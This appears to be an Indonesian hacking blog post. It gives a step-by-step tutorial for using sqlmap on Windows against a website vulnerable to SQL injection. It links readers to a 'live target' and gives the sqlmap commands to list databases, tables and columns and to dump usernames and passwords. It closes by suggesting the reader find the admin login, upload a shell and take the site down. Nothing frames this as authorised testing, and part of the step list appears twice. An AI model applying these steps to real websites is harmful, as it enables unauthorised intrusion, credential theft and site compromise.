ok gan back lagi bersama saya
kali ini gw disini mau kasih tutorial cara menggunakan sqlmap di windows
Sqlmap merupakan tools untuk mengscan / mencari vuln sqli injection pada sebuah website, sama seperti Havij
Hal 1 lo harus download dulu tools sqlmap nya di bawah ini
Next caranya
1. hal 1 lu harus ada target yg vuln terhadap sqli, klo ga ada nih gw ada live targetnya >> Klik Disini !!!
2. Buka CMD, lalu ketik
Klik Disini !!!Klo udh di download, ekstrak di folder C:/
Next caranya
1. hal 1 lu harus ada target yg vuln terhadap sqli, klo ga ada nih gw ada live targetnya >> Klik Disini !!!
2. Buka CMD, lalu ketik
cd c:/sqlmap
3. Ketik lagi
sqlmap.py -u target.com --dbs
4. Biarkan dia mengscan
Nah ini udh ketemu name DB nya
Selanjutnya ketik
sqlmap.py -u target.com -D namaDB-nya --tables
Biarkan dia mengscan , klo udh akan muncul tablesnya speri gmbr dibawah ini
Lalu pilih tables yg menurut lu isinya itu username & password
Lalu ketik
sqlmap.py -u target.com -D nama-DB -T userlogin --columns
biarkan dia mengscan, kalau sudah akan muncul seperti ini
Lalu ketik
sqlmap.py -u target.com -D nama-DB -T userlogin --columns -C Password,Username --dump
Biarkan dia mengscan, Klo berhasil seperti ini
Congratulations yg gw tandain username & password udh di dapat, tinggal cari admin login > up shell > tebas awokowk
Ok sekian...
Terima kasih sudah berkunjung ke blog saya >_<
Next time gw akan share tools yg bermanfaat :v
~Admin.Ddy